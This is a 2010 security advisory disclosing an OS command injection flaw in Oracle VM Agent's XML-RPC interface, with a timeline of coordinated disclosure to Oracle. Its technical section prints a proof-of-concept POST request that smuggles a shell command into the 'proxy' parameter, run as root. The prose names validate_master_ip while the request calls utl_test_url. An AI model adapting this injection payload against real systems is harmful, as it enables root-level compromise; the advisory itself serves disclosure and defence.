Oracle Virtual Server Agent Command Injection

`Oracle Virtual Server Agent Command Injection  
=============================================  
  
1. Advisory Information  
Advisory ID: BONSAI-2010-0109  
Date published: 2010-10-13  
Vendors contacted: Oracle  
Release mode: Coordinated release  
  
2. Vulnerability Information  
Class: Injection  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
  
3. Software Description  
Oracle VM is server virtualization software which fully supports both  
Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost  
server virtualization that is three times more efficient than existing  
server virtualization products from other vendors. Oracle has also  
announced certification of key Oracle products including Oracle  
Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real  
Application Clusters with Oracle VM.  
  
Oracle VM Manager communicates with Oracle VM Agent to create and manage  
guests on an Oracle VM Server. Oracle VM Agent is installed and  
configured during the installation of Oracle VM Server.  
  
By default, Oracle VM Agent is executed, with a highly privileged user,  
typically root.  
  
4. Vulnerability Description  
Injection flaws, such as SQL, OS, and LDAP injection, occur when  
untrusted data is sent to an interpreter as part of a command or query.  
The attacker’s hostile data can trick the interpreter into executing  
unintended commands or accessing unauthorized data.  
  
5. Vulnerable packages  
We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle  
VM Agent 2.3.  
  
6. Non-vulnerable packages  
Patch set 2.2.1 and above  
  
7. Credits  
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-  
bonsai-sec.com ).  
  
8. Technical Description  
8.1. OS Command Injection  
CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)  
Oracle VS Agent is prone to a remote command execution vulnerability  
because the software fails to adequately sanitize user-supplied input.  
Oracle VS Agent exposes through XML-RPC several functions. One of these  
functions is validate_master_ip, which receives four parameters. The  
second parameter "proxy", is vulnerable to command injection, because it  
is not properly sanitized and its content is concatenated in an  
operative system command, executed as a highly privileged user  
(typically root).  
The following POST message can be sent to the VM Agent XML-RPC port. By  
doing this, the ping command is executed as follows:  
  
POST /RPC2 HTTP/1.0  
User-Agent: XML-RPC for PHP 3.0.0.beta  
authorization: Basic XXXXXXXXXXXXXXX  
Host: XXX.XXX.XXX.XXX:8899  
Accept-Encoding: gzip, deflate  
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII  
Content-Type: text/xml  
Content-Length: 416  
  
<?xml version="1.0"?>  
<methodCall>  
<methodName>utl_test_url</methodName>  
<params>  
<param>  
<value><string>http://192.168.1.101</string></value>  
</param>  
<param>  
<value><string>192.168.1.103'; ping –c 10 localhost; '</string></value>  
</param>  
<param>  
<value><string>192.168.1.101</string></value>  
</param>  
<param>  
<value><string>192.168.1.101</string></value>  
</param>  
</params>  
</methodCall>  
  
9. Report Timeline  
• 2010-09-24 / Bonsai provides vulnerability information to ORACLE  
• 2010-09-29 / Oracle confirms the vulnerability  
• 2010-10-12 / Oracle published Critical Patch Update Fix  
• 2010-10-13 / Public Disclosure  
  
10. About Bonsai  
Bonsai is a company involved in providing professional computer  
information security services. Currently a sound growth company, since  
its foundation in early 2009 in Buenos Aires, Argentina, we are fully  
committed to quality service, and focused on our customers real needs.  
  
11. Disclaimer  
The contents of this advisory are copyright (c) 2010 Bonsai Information  
Security, and may be distributed freely provided that no fee is charged  
for this distribution and proper credit is given.  
  
12. Research  
http://www.bonsai-sec.com/en/research/vulnerability.php  
  
`